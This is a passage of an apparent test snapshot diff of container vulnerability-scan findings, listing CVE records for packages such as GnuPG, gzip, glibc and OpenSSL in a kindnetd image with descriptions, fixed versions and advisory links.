"https://www.cve.org/CVERecord?id=CVE-2022-34903", - "https://www.debian.org/security/2022/dsa-5174", - "https://www.openwall.com/lists/oss-security/2022/06/30/1", - ], - }, - "category": "Vulnerability", - "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Signature spoofing via status line injection", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-34903", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6602", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-34903", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, { "type": "URL", - "value": "https://bugs.debian.org/1014157", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2102868", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://dev.gnupg.org/T6027", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6602", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "X.400 address type confusion in X.509 GeneralName", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-1", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-2", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5174", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "value": "https://bugzilla.redhat.com/2164440", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3219", - "installedVersion": "2.2.27-2+deb11u1", - "packageName": "gpgv", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-3219", - "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", - "https://dev.gnupg.org/D556", - "https://dev.gnupg.org/T5993", - "https://marc.info/?l=oss-security&m=165696590211434&w=4", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", - "https://security.netapp.com/advisory/ntap-20230324-0001/", - "https://www.cve.org/CVERecord?id=CVE-2022-3219", - ], - }, - "category": "Vulnerability", - "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "denial of service issue (resource consumption) using compressed packets", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3219", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3219", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://dev.gnupg.org/D556", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5993", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.10-4+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "1.10-4", - "packageName": "gzip", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", - ], - }, - "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "iptables", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "libapt-pkg6.0", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.31-13+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://linux.oracle.com/cve/CVE-2023-0464.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + 